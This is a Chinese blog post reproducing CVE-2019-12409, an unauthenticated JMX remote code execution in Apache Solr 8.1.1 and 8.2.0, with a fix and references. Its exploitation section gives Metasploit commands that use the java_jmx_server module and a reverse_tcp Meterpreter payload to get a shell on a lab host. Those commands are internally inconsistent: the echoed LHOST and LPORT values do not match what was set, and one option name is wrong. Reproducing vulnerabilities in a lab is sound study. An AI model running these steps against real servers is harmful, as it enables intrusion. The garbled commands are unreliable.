Apache Solr JMX服务远程代码执行漏洞复现

最新推荐文章于 2024-07-19 16:04:17 发布
最新推荐文章于 2024-07-19 16:04:17 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: web安全 漏洞复现 文章标签: Apache Solr JMX服务远程代码执行漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41770175/article/details/103237198
版权

##0x00 漏洞介绍
该漏洞源于默认配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置选项存在安全风险。
Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS="true"选项。
如果使用受影响版本中的默认solr.in.sh文件,那么将启用JMX监视并将其暴露在RMI_PORT上(默认值= 18983),
并且无需进行任何身份验证。 如果防火墙中的入站流量打开了此端口,则具有Solr节点网络访问权限的任何人都将能够访问JMX,
并且可以上传恶意代码在Solr服务器上执行。该漏洞不影响Windows系统的用户,仅影响部分版本的Linux用户。

##0x01 影响版本
Apache Solr8.1.1和8.2.0版本

##0x02 漏洞危害
如果受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击,执行任意代码。

##0x03 准备工作
1) 搭建环境
安装Apache Solr 8.20
wget https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip


2) 启动环境

##0x04 漏洞复现
1) 访问默认端口 8993 出现以下界面正面漏洞环境搭建成功


2) 攻击机操作
#第一步
msf5 > use exploit/multi/misc/java_jmx_server
msf5 exploit(multi/misc/java_jmx_server) > set RHOSTS 192.168.50.33
RhOSTS => 192.168.50.33
msf5 exploit(multi/misc/java_jmx_server) > set RPORTS 18983
#第二步
msf5 > use java/meterpreter/reverse_tcp
msf5 payload(java/meterpreter/reverse_tcp) > set LHOST 127.0.0.1
LHOST => 192.168.50.33
msf5 payload(java/meterpreter/reverse_tcp) > set LPORT 192.168.50.33
LPORT => 4444
msf5 exploit(multi/misc/java_jmx_server) > run

##0x05 修复方案
将solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS选项设置为false,然后重启Solr服务。

##0x06 参考链接
https://www.t00ls.net/articles-53901.html
https://github.com/jas502n/CVE-2019-12409

PeiSylon
关注
专栏目录
Apache Solr 代码执行漏洞应急响应通告
05-05
Apache Solr 代码执行漏洞应急响应通告
漏洞复现Apache系列(二)之Solr漏洞复现
qq_45244158的博客
03-01 8218
漏洞复现Apache系列(二)之Solr漏洞复现
JMX安全漏洞修复 服务端增加用户名和密码验证机制
zhaoshuangjian
04-27 1511
JMX安全漏洞修复 服务端增加用户名和密码验证机制
JMX 反序列化漏洞
最新发布
CTZL123456的博客
07-19 852
前段时间看到普元 EOS Platform 爆了这个洞,Apache James,Kafka-UI 都爆了这几个洞,所以决定系统来学习一下这个漏洞点。
Apache Solr 8.1.1和8.2.0版本 JMX服务远程代码执行漏洞(CVE-2019-12409)
weixin_44047654的博客
02-14 640
Apache Solr 8.1.1和8.2.0版本 JMX服务远程代码执行漏洞(CVE-2019-12409)
在Jetty容器运行Solr----标准运行方式
天涯人
11-01 7215
事实上,Solr的包下载下来以后,是可以不用配置tomcat,而直接使用内置的Web容器即可运行的。   这个内置的Web容器,就是Jetty。   dos进入下载包的解压后的主目录,下面以包主目录说明。   我的包解压后是放在  D:\apache\apache-solr-3.6.1。   1.找到Solr下载包的主目录   2. DOS进入Solr下载包主目录下的exa
【vulfocus漏洞复现-初级】solr 代码执行 (CVE-2019-12409)
ll_515的博客
01-20 2113
Apache Solr受影响的版本8.1.1和8.2.0在solr.in.sh配置文件中默认开启了ENABLE_REMOTE_JMX_OPTS配置项,即允许远程加载JMX,导致可远程代码执行
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以...
Apache Solrsolr-8.11.1.tgz)
01-10
Apache Solr 是一个开源的全文搜索引擎,由Apache软件基金会维护,是Lucene项目的一部分。它提供了高效、可扩展的搜索和导航功能,广泛应用于企业级的搜索应用中。Solr-8.11.1是该软件的一个特定版本,包含了最新的...
Apache Solrsolr-8.11.1.zip)
01-10
Apache Solr是一款开源的企业级搜索平台,由Apache软件基金会维护。它是基于Java的,提供了高效、可扩展的全文检索、数据分析和分布式搜索功能。Solr-8.11.1是该软件的一个特定版本,包含了从早期版本到8.11.1的所有...
Apache Solrsolr-7.7.3.tgz)
02-05
总之,Apache Solr-7.7.3是一个强大的搜索平台,提供了一整套工具和服务,帮助用户在大规模数据集上执行高效的全文搜索。通过理解和熟练掌握Solr的配置、管理和API,你可以在各种场景下实现高效、定制化的搜索解决...
solr漏洞合集
weixin_46626737的博客
07-02 952
在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)漏洞版本:Apache Solr 5.0.0 ~8.3.1。漏洞版本:Apache Solr < 8.2.0。3.solr远程代码执行(CVE-2017-12629)5.solr的XXE漏洞(CVE-2017-12629)2.solr远程代码执行(CVE-2019-0193)漏洞版本:Apache Solr < 7.1。漏洞版本:Apache Solr < 7.1。
漏洞复现】CVE-2019-12409 Apache Solr RCE 漏洞复现利用、开启ufw防火墙进行防御 【实验报告】
Thmos_vader的嵌入式学习笔记
05-25 836
这就是iptables的目的。默认的配置文件solr.in.sh的选项ENABLE_REMOTE_JMX_OPTS字段值被设置为”true”,这会启用JMX监视服务并会在公网中监听一个18983的RMI端口,没有任何认证,也就是说在无需身份验证情况下,攻击者结合使用JMX RMI就会造成远程代码攻击。可以通过“打开”或“关闭”(即过滤)为特定类型的流量指定的端口来允许或阻止流向特定应用程序的流量。进出计算机的流量通过“端口”进行过滤,“端口”是附加到供特定应用程序使用的流量数据包的相对任意的名称。
(环境搭建+复现)CVE-2019-12409 Apache Solr远程代码执行漏洞
daxi0ng的博客
03-16 3156
【CVE编号】 CVE-2019-12409 【漏洞名称】 Apache Solr远程代码执行漏洞 1【靶标分类】 web中间件漏洞 2【漏洞分类】 命令执行 3【漏洞等级】 高 4【漏洞简介】 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件...
Apache Solr 远程命令执行漏洞复现(CVE-2017-12629)
0xSec
12-26 1009
Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口。用户可以通过 http 请求,向搜索引擎服务器提交一定格式的 XML 文件,生成索引;也 可以通过 Http Get 操作提出查找请求,并得到 xml/json 格式的返回结果。Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。
漏洞复现Apache Solr 远程命令执行漏洞(CVE-2019-0193)
Pluto.的博客
12-27 3676
文章目录Vulhub漏洞复现Apache Solr远程命令执行漏洞复现(CVE-2019-0193)一、漏洞概述二、漏洞复现1. 复现步骤2. 利用该漏洞getshell Vulhub漏洞复现 Apache Solr远程命令执行漏洞复现(CVE-2019-0193) 一、漏洞概述 Apache Solr搜索服务,它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引(solr 中索引库用 core
java jmx agent不安全的配置漏洞
weixin_51378457的博客
03-15 4641
APP应该以明示或自愿同意的方式告知用户其需要收集的信息类型、范围、目的、使用方法、储存期限、安全保护措施等信息,并在获得用户授权前明确告知用户数据是否会分享、转让等情况。在搜集用户信息时,需明确具体收集哪些信息,以及收集的目的和用途等。APP应该尊重用户的知情权、选择权、访问权、更正权、删除权、注销权等权益,让用户能够随时查看自己的信息,可以对其进行更正、删除等操作。APP应该合法、公正地收集个人信息,包括在合法法律、法规、规章、标准规定范围内的行为,如经过用户授权同意,且该同意为自愿行为等。
Apache Solr JMX服务 RCE 漏洞复现
m0_48520508的博客
07-12 452
0x00简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 该漏洞源于默认配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置选项存在安全风险。 Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS=
rmi远程代码执行漏洞_[漏洞预警]CVE201912409/Apache Solr由于错误配置JMX RMI导致远程代码执行...
weixin_30101051的博客
01-05 488
漏洞描述近日安全研究人员JanHøydahl披露了Apache Solr的8.1.1和8.2.0发行版中的默认配置文件solr.in.sh,在其配置文件中ENABLE_REMOTE_JMX_OPTS字段默认配置不安全.如果使用受影响版本中的默认配置,那么将启用JMX监视服务并将对公网监听一个18983的RMI端口,且无需进行任何身份验证,配合JMX RMI将会导致远程代码执行.CVE编号...
Apache Solr 高危代码执行漏洞通告及修复建议
这个漏洞的关键在于Apache Solr 的配置文件可被未经授权的用户修改,这使得攻击者能够通过构造恶意数据,执行远程代码执行(RCE)攻击,从而可能获取到服务器的控制权。漏洞的存在表明,只要满足以下条件,攻击者就...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值